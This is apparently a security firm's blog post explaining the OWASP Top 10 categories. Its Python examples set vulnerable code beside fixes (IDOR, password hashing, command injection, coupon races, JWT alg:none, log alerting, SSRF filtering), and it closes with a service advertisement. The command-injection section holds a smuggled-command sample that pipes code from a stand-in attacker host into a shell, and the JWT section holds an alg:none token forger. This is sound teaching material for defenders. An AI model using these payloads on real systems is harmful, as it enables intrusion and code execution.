The OWASP Top 10 is the most widely referenced web application security list there is. Indian regulators cite it. Indian RFPs require coverage of it. ISO 27001 auditors ask which categories your last test addressed. Here are the ten categories of the 2021 edition (the numbering most RFPs and auditors still quote), each explained with the kinds of bugs we keep finding in Indian production systems.
- A01 — Broken Access Control
- A02 — Cryptographic Failures
- A03 — Injection
- A04 — Insecure Design
- A05 — Security Misconfiguration
- A06 — Vulnerable and Outdated Components
- A07 — Identification and Authentication Failures
- A08 — Software and Data Integrity Failures
- A09 — Security Logging and Monitoring Failures
- A10 — Server-Side Request Forgery (SSRF)
A01 — Broken Access Control
Still the leader. In OWASP's 2021 data, 94% of applications were tested for some form of broken access control, with an average incidence rate of 3.81%. In Indian engagements we see it most often as IDOR: a sequential or guessable identifier in a URL or API request that, when changed, returns another tenant's data. Indian SaaS products and fintech APIs are particularly exposed because in most ORMs a fetch-by-primary-key call looks the same whether or not the caller owns the row, so nothing in the code reminds the developer to scope the query.
Test it by enumerating every authenticated endpoint with two user accounts in two different tenants, swapping the IDs between them, and watching for HTTP 200 where a 403 (or a 404, if the application hides existence) is expected. Compare bodies as well as status codes: some applications return 200 with an empty object, others return 200 with the other tenant's record.
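The pattern described above in runnable form, as an added example that is not code from the original page or from any client system: a fetch-by-ID handler that never looks at the caller, a tenant-scoped version of the same handler, and the two-account differential check run against both. The invoice data, the two users and the in-memory "ORM" are constructed for the demo. The fixed handler answers 404 rather than 403 for a foreign ID, so the test looks for 200 where the caller is not the owner.

```python
"""IDOR differential check: fetch-by-ID that ignores the caller, the tenant-scoped
fix, and a two-account test that flags cross-tenant 200s. Constructed data."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Invoice:
    id: int
    tenant_id: int
    amount: int


@dataclass(frozen=True)
class User:
    id: int
    tenant_id: int


# Constructed sample data: sequential invoice IDs spanning two tenants.
INVOICES = {
    101: Invoice(101, tenant_id=1, amount=5000),
    102: Invoice(102, tenant_id=2, amount=7200),
}
ALICE = User(id=1, tenant_id=1)   # tenant 1
BOB = User(id=2, tenant_id=2)     # tenant 2


class NotFound(Exception):
    pass


def get_invoice_vulnerable(caller, invoice_id):
    """Typical ORM 'get by primary key': the caller is never consulted."""
    try:
        return INVOICES[invoice_id]
    except KeyError:
        raise NotFound(invoice_id)


def get_invoice_fixed(caller, invoice_id):
    """Scope the lookup by the caller's tenant. A foreign ID is treated exactly
    like a missing one, so the response does not confirm that it exists."""
    inv = INVOICES.get(invoice_id)
    if inv is None or inv.tenant_id != caller.tenant_id:
        raise NotFound(invoice_id)
    return inv


def status(handler, caller, invoice_id):
    """Reduce a handler call to the HTTP status a tester would observe."""
    try:
        handler(caller, invoice_id)
        return 200
    except NotFound:
        return 404


def idor_findings(handler, users, invoice_ids):
    """Request every ID as every user; report (user_id, invoice_id) pairs where a
    record belonging to another tenant came back with 200."""
    findings = []
    for user in users:
        for invoice_id in invoice_ids:
            owner = INVOICES[invoice_id].tenant_id
            if owner != user.tenant_id and status(handler, user, invoice_id) == 200:
                findings.append((user.id, invoice_id))
    return findings


if __name__ == "__main__":
    print("vulnerable:", idor_findings(get_invoice_vulnerable, [ALICE, BOB], [101, 102]))
    print("fixed:     ", idor_findings(get_invoice_fixed, [ALICE, BOB], [101, 102]))
```

Against a real API the two handler calls become two HTTP sessions and the ID list comes from crawling each account's own responses; the comparison logic stays the same.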
A02 — Cryptographic Failures
Renamed from "Sensitive Data Exposure". The category covers data at rest, data in transit, and the keys that protect both.
The classics we still find in Indian production: login pages served over plain HTTP, expired or self-signed certificates on internal admin panels, AES in ECB mode in custom token formats, keys hard-coded in mobile apps, password fields stored as unsalted SHA-1 or MD5, and full PAN or Aadhaar numbers in JSON responses where the UI masks them for display but the API behind it does not.
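The password-storage item is the one most worth seeing side by side. Below is an added example, not code from the original page or from any client: the unsalted SHA-1 scheme as we find it, next to salted PBKDF2-HMAC-SHA256 from the Python standard library. The two sample users and their shared weak password are constructed; the iteration count follows OWASP's current guidance for PBKDF2-HMAC-SHA256.

```python
"""Unsalted SHA-1 password storage (the finding) next to salted PBKDF2-HMAC-SHA256
(the fix), standard library only. Sample users are constructed."""
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000   # OWASP recommendation for PBKDF2-HMAC-SHA256


def store_sha1(password):
    """The broken scheme: same password, same digest, for every user on every site,
    so one cracked hash (or one rainbow table) unlocks all of them."""
    return hashlib.sha1(password.encode()).hexdigest()


def store_pbkdf2(password, salt=b""):
    """Per-user random salt and a deliberately slow KDF. The stored record carries
    the algorithm, iteration count and salt, so parameters can be raised later."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "$".join(["pbkdf2_sha256", str(PBKDF2_ITERATIONS), salt.hex(), digest.hex()])


def verify_pbkdf2(password, record):
    """Recompute with the stored parameters and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed sample: two users who both chose the same weak password.
USERS = {"ravi": "Password123", "priya": "Password123"}


def same_stored_value(users, store):
    """True if any two users end up with an identical stored value, which is what
    lets an attacker spot shared passwords in a dumped table."""
    stored = [store(pw) for pw in users.values()]
    return len(set(stored)) < len(stored)


if __name__ == "__main__":
    print("SHA-1 collisions across users:", same_stored_value(USERS, store_sha1))
    print("PBKDF2 collisions across users:", same_stored_value(USERS, store_pbkdf2))
```

If a production library such as Argon2id or bcrypt is available, prefer it; the point that transfers is the per-user salt, the slow KDF, the self-describing record and the constant-time comparison.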
A03 — Injection
SQL injection is no longer the daily find it was a decade ago; parameterised queries and ORMs won that fight. What is alive and well: NoSQL injection through MongoDB query objects (an operator such as $gt where a string was expected), LDAP injection in custom enterprise SSO, XPath injection in the XML-based SOAP services still common in Indian government tenders, and command injection in any feature that passes user input to os.system or a shell, most often file-conversion or PDF-generation features.
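The command-injection case from that list, as an added example that is not code from the original page or from any product: the os.system string as it is usually written in a "convert my upload to PDF" feature, next to an argv-based call with an allowlisted filename. The upload and output directories, the converter command line and the sample filenames are constructed assumptions.

```python
"""Command injection in a file-conversion feature: the shell string that gets
written, and the argv-plus-allowlist replacement. Paths and command are assumed."""
import re
import subprocess

UPLOAD_DIR = "/srv/uploads"      # assumed location of uploaded files
OUTPUT_DIR = "/srv/converted"    # assumed location for generated PDFs

# One leading alphanumeric, a bounded run of safe characters, then an allowed
# extension. No '/', so no traversal; no shell metacharacters at all.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}\.(docx|xlsx|pptx)")


def convert_command_vulnerable(filename):
    """The string handed to os.system(): user input spliced into a shell command.
    'report.docx; curl attacker.example/x | sh' is two commands to the shell."""
    return (f"libreoffice --headless --convert-to pdf "
            f"--outdir {OUTPUT_DIR} {UPLOAD_DIR}/{filename}")


def is_safe_filename(filename):
    return SAFE_NAME.fullmatch(filename) is not None


def convert_argv(filename):
    """argv for subprocess.run(..., shell=False). With no shell involved, ';', '|',
    '$(' and backticks are just characters in a filename the allowlist already
    refused."""
    if not is_safe_filename(filename):
        raise ValueError(f"rejected filename: {filename!r}")
    return ["libreoffice", "--headless", "--convert-to", "pdf",
            "--outdir", OUTPUT_DIR, f"{UPLOAD_DIR}/{filename}"]


def convert(filename):
    """Run the converter. Needs libreoffice installed; not exercised by the tests."""
    return subprocess.run(convert_argv(filename), shell=False,
                          capture_output=True, timeout=120)


if __name__ == "__main__":
    print(convert_command_vulnerable("report.docx; id"))
    print(convert_argv("Q3-report_v2.docx"))
```

The allowlist is the first line of defence and the absence of a shell is the second; keep both, because a future developer will eventually add an option that the regex never anticipated.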
A04 — Insecure Design
The category that punishes architecture, not code. The Indian classic: a "forgot password" flow that resets the password on presentation of an OTP sent over SMS, with no rate limit, account lockout or replay protection on the OTP check. Every line of the flow is implemented correctly. The flow itself is the bug.
The other Indian classic: a discount-coupon endpoint where the "is this coupon still valid?" check and the "record one more use" write are separate statements, so a client firing 50 requests in parallel passes the check 50 times and redeems a single-use coupon 50 times before the first write lands.
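The coupon race in runnable form, as an added example that is not code from the original page or from any client system. It uses a temporary SQLite database and 50 threads, with a barrier that holds every request between its read and its write so the race window is hit deterministically (in production the window is the network round-trip). The coupon, its single-use limit and the thread count are constructed.

```python
"""Coupon redemption race: read-check-write across 50 parallel requests, next to a
single conditional UPDATE that the database serialises. Constructed data."""
import os
import sqlite3
import tempfile
import threading

REQUESTS = 50          # parallel redemptions, as in the text
COUPON = "DIWALI50"    # constructed single-use coupon


def create_db():
    path = os.path.join(tempfile.mkdtemp(), "shop.db")
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE coupon (code TEXT PRIMARY KEY, "
                 "uses INTEGER NOT NULL, max_uses INTEGER NOT NULL)")
    conn.execute("INSERT INTO coupon VALUES (?, 0, 1)", (COUPON,))
    conn.commit()
    conn.close()
    return path


def connect(path):
    # Autocommit; wait up to 30 s for another writer instead of failing with
    # 'database is locked', as a pooled app connection would.
    return sqlite3.connect(path, isolation_level=None, timeout=30)


def redeem_vulnerable(path, barrier):
    """Read, decide in application code, then write: two statements, one window."""
    conn = connect(path)
    try:
        uses, max_uses = conn.execute(
            "SELECT uses, max_uses FROM coupon WHERE code = ?", (COUPON,)).fetchone()
        barrier.wait()   # every request has now read, none has written: the race window
        if uses >= max_uses:
            return False
        conn.execute("UPDATE coupon SET uses = uses + 1 WHERE code = ?", (COUPON,))
        return True
    finally:
        conn.close()


def redeem_atomic(path, barrier):
    """One conditional UPDATE: the check and the increment happen under the same
    lock, and rowcount tells the caller whether this request won."""
    conn = connect(path)
    try:
        barrier.wait()
        cur = conn.execute("UPDATE coupon SET uses = uses + 1 "
                           "WHERE code = ? AND uses < max_uses", (COUPON,))
        return cur.rowcount == 1
    finally:
        conn.close()


def race(redeem, requests=REQUESTS):
    """Fire `requests` redemptions in parallel; return (successful responses, uses in DB)."""
    path = create_db()
    barrier = threading.Barrier(requests)
    results, lock = [], threading.Lock()

    def worker():
        ok = redeem(path, barrier)
        with lock:
            results.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    conn = connect(path)
    (uses,) = conn.execute("SELECT uses FROM coupon WHERE code = ?", (COUPON,)).fetchone()
    conn.close()
    return sum(results), uses


if __name__ == "__main__":
    print("vulnerable (ok responses, uses recorded):", race(redeem_vulnerable))
    print("atomic     (ok responses, uses recorded):", race(redeem_atomic))
```

The same fix applies to stock decrements, wallet debits and referral bonuses: push the condition into the statement (or use SELECT ... FOR UPDATE inside one transaction on databases that support it) and treat rowcount 0 as "sold out".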
A05 — Security Misconfiguration
The biggest category by surface area. Default credentials on Jenkins, Tomcat and RabbitMQ management ports, MongoDB bound to 0.0.0.0 with no authentication, S3 buckets readable by AllUsers, Kubernetes dashboards exposed on a public LoadBalancer, and Spring Boot Actuator endpoints (env, heapdump) reachable without authentication, which on Indian B2B SaaS estates is shockingly common.
A06 — Vulnerable and Outdated Components
Log4j 2.x below 2.17 (Log4Shell, CVE-2021-44228) is still in Indian production. Spring4Shell (CVE-2022-22965). Old Apache Struts. jQuery below 3.4 on customer-facing pages, with its prototype pollution through $.extend. WordPress plugins three major versions behind. The fix is an SBOM and a patching SLA; the finding, in the report, is usually just npm audit or retire.js output.
A07 — Identification and Authentication Failures
Password policies that allow Password123. JWTs with alg:none still accepted by the verifier. Session IDs in URLs. Forgot-password tokens valid for a week. SMS OTPs brute-forceable because the lockout counter lives in the client, not the server. We see at least one of these in roughly half of Indian web engagements.
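The alg:none item is the one developers most often doubt until they see it, so here it is as an added example, not code from the original page or from any library: a verifier that lets the token's header choose the algorithm, next to one that pins HS256 server-side, compares in constant time and enforces exp. Standard library only; the key and the claims are constructed, and the vulnerable verifier models the "trust the header" behaviour rather than any specific library's bug.

```python
"""JWT verification that rejects alg:none by pinning the algorithm server-side.
Standard library only; key and claims are constructed."""
import base64
import hashlib
import hmac
import json
import time

SECRET = b"constructed-demo-key-do-not-reuse"   # assumption: really from a secret store


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims, key):
    """What the server issues."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def forge_alg_none(claims):
    """What the attacker submits: a header claiming no signature, and none attached."""
    header = b64url_encode(b'{"alg":"none","typ":"JWT"}')
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header}.{payload}."


def verify_vulnerable(token, key):
    """Lets the token pick the algorithm: 'none' means 'skip the check'."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(payload_b64))
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if expected != b64url_decode(sig_b64):     # also not a constant-time compare
        return None
    return json.loads(b64url_decode(payload_b64))


def verify_fixed(token, key, now=None):
    """The server decides the algorithm; constant-time compare; exp is mandatory."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        if header.get("alg") != "HS256":
            return None
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        claims = json.loads(b64url_decode(payload_b64))
    except ValueError:      # wrong segment count, bad base64, bad JSON
        return None
    exp = claims.get("exp")
    current = now if now is not None else time.time()
    if not isinstance(exp, (int, float)) or exp <= current:
        return None
    return claims


if __name__ == "__main__":
    forged = forge_alg_none({"sub": "ravi", "role": "admin", "exp": 4102444800})
    print("vulnerable accepts forged token:", verify_vulnerable(forged, SECRET))
    print("fixed accepts forged token:     ", verify_fixed(forged, SECRET))
```

With a real JWT library the equivalent is passing an explicit algorithms allowlist to the decode call and never reading alg from the token to decide how to verify it; the same pinning is what stops the HS256/RS256 confusion variant, where a public key is fed to the HMAC verifier.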
A08 — Software and Data Integrity Failures
Insecure deserialization (Java readObject, Python pickle, .NET BinaryFormatter), npm dependencies installed without a lockfile, CI/CD pipelines pulling Docker images by the :latest tag from public registries with no digest pinning. This is the supply-chain category. Underrated and very, very common.
A09 — Security Logging and Monitoring Failures
Most Indian businesses we audit have logging. Few have monitoring. Fewer still have alerting tied to a SOC, or to a person who would notice at 02:30 IST. The test we apply is: "If we performed the most obvious attack of the last hour, would your team know?" The answer is almost always no.
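What "would your team know?" looks like as code, as an added example that is not from the original page or from any client's SIEM: a sliding-window rule over authentication logs that raises one alert when a single source IP crosses a failed-login threshold, which is the obvious attack of the last hour in most of our engagements. The log line format (ISO-8601 timestamp with IST offset, event name, key=value fields) and the lines themselves are constructed.

```python
"""Failed-login burst detection over constructed auth log lines: a sliding
window per source IP that alerts once when the threshold is crossed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(minutes=5)
THRESHOLD = 10
IST = timezone(timedelta(hours=5, minutes=30))


def constructed_log():
    """Three failures from a forgetful user who then logs in, and an OTP brute force
    of twelve attempts in two minutes from one address. Constructed, not real."""
    base = datetime(2025, 11, 14, 2, 30, 0, tzinfo=IST)
    lines = [f"{(base + timedelta(seconds=40 * i)).isoformat()} login_failed user=ravi ip=203.0.113.7"
             for i in range(3)]
    lines.append(f"{(base + timedelta(seconds=130)).isoformat()} login_ok user=ravi ip=203.0.113.7")
    lines += [f"{(base + timedelta(seconds=10 * i)).isoformat()} login_failed user=priya ip=198.51.100.23"
              for i in range(12)]
    return sorted(lines)   # delivered in timestamp order, as a collector would


def parse(line):
    """'<iso timestamp> <event> k=v k=v ...' -> (datetime, event, fields dict)."""
    ts, event, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.fromisoformat(ts), event, kv


def alerts_for(lines, threshold=THRESHOLD, window=WINDOW):
    """Return [(ip, iso timestamp, failures in window)] with one entry per source
    that reached `threshold` failed logins inside `window`."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    alerted = set()
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ts, event, kv = parse(line)
        if event != "login_failed":
            continue
        ip = kv["ip"]
        window_q = recent[ip]
        window_q.append(ts)
        while window_q and ts - window_q[0] > window:
            window_q.popleft()
        if len(window_q) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append((ip, ts.isoformat(), len(window_q)))
    return alerts


if __name__ == "__main__":
    for ip, when, count in alerts_for(constructed_log()):
        print(f"ALERT {when}: {count} failed logins from {ip} within {WINDOW}")
```

The rule is deliberately simple; the part that is usually missing in the estates we audit is not the rule but the route from its output to a phone that rings.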
A10 — Server-Side Request Forgery (SSRF)
Added to the list in 2021 on the strength of the community survey. Any feature that fetches a URL on behalf of the user is a candidate: image proxies, link previews, webhook senders, oEmbed handlers, PDF-to-image converters. Combined with the cloud metadata endpoint (169.254.169.254 on AWS, GCP and Azure), an SSRF escalates to theft of the instance's temporary credentials and from there, depending on the attached role, to control of the cloud account. Two caveats a practitioner should know: AWS IMDSv2 (a PUT to obtain a session token before any GET), and the mandatory Metadata-Flavor: Google and Metadata: true request headers on GCP and Azure, defeat the simplest GET-only SSRF, so the impact on a hardened estate depends on how much control the bug gives over method and headers.
This is the bug our team has used most often in Indian engagements over the last 18 months to demonstrate critical impact from a "minor" feature.
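The outbound-URL check that closes most of these, as an added example that is not code from the original page or from any product. It refuses non-HTTP schemes, userinfo tricks, unexpected ports, and any host whose every resolved address is not public, which covers 169.254.169.254, the metadata hostnames, RFC 1918 space and IPv4-mapped loopback. The resolver is injectable so the demo runs offline against a constructed DNS table; the "public" address in that table is a placeholder, and the rebinding entry models a host that answers with one safe and one loopback address.

```python
"""Outbound-URL allow check for link previews, webhooks and image proxies:
resolve the host, refuse anything that is not a public address. The DNS table
is constructed so the example runs offline."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Constructed answers standing in for DNS. The last entry models DNS rebinding:
# one public answer to pass a naive check, one loopback answer for the real fetch.
FAKE_DNS = {
    "cdn.example.com": ["93.184.216.34"],                  # placeholder public address
    "metadata.google.internal": ["169.254.169.254"],
    "jenkins.corp.internal": ["10.20.0.15"],
    "rebind.attacker.example": ["93.184.216.34", "127.0.0.1"],
}


def resolve_fake(host):
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise socket.gaierror(f"no such host: {host}")


def resolve_real(host):
    """Production resolver: every A/AAAA answer, so a rebinding host is judged on all."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public(addr):
    ip = ipaddress.ip_address(addr)
    mapped = getattr(ip, "ipv4_mapped", None)   # ::ffff:127.0.0.1 is loopback, not new space
    if mapped is not None:
        ip = mapped
    # is_global is False for RFC 1918, loopback, 0/8, 100.64/10, 169.254/16 (link-local,
    # which is where every cloud metadata service lives), IPv6 ULA and link-local.
    return ip.is_global and not ip.is_multicast


def check_outbound_url(url, resolver=resolve_fake):
    """Return (allowed, reason or vetted IP). The caller must connect to the vetted IP
    (sending the original Host header) and must re-run this check on every redirect,
    otherwise rebinding or a 302 to 169.254.169.254 walks straight past it."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return False, "malformed url"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in url"           # http://cdn.example.com@169.254.169.254/
    host = parts.hostname
    if not host:
        return False, "no host"
    port = port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, f"port {port}"
    try:
        ipaddress.ip_address(host)
        addrs = [host]                              # IP literal, including [::ffff:a.b.c.d]
    except ValueError:
        try:
            addrs = resolver(host)                  # decimal/octal forms (2130706433) land here too
        except socket.gaierror:
            return False, "unresolvable host"
    for addr in addrs:
        if not is_public(addr):
            return False, f"{host} resolves to {addr}, which is not public"
    return True, addrs[0]


if __name__ == "__main__":
    for u in ["https://cdn.example.com/logo.png", "http://169.254.169.254/latest/meta-data/",
              "http://rebind.attacker.example/", "http://cdn.example.com@169.254.169.254/"]:
        print(u, "->", check_outbound_url(u))
```

Pair the check with a network-level control (egress rules or a proxy that cannot reach the metadata range) and, on AWS, enforce IMDSv2 on every instance; the application-layer check then becomes one of two independent barriers rather than the only one.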
When an ISO 27001 auditor asks "how did you address OWASP Top 10?", the right answer is a VAPT report that maps each finding to a category — and the categories with zero findings are explicitly listed as tested-and-clean. Our reports do this by default.
If you have not tested against the current list yet, the relevant service pages are web application VAPT and API security testing. For the test plan we use, see the 47-test checklist.
Need a VAPT engagement scoped against this?
Tell us the asset and the compliance overlay. We will come back with a scope, timeline, and fixed-fee quote within 24 hours. Engagements start at USD 500. Free retest included.
Book a 20-minute call →
BERRY9 IT SERVICES — VAPT Practice
Hyderabad-based ISO 27001 + 9001 certified offensive-security team. Since 2015 we have run 500+ engagements for 100+ clients across pharma, BFSI, healthcare, VFX, and enterprise SaaS. Every engagement includes a free retest.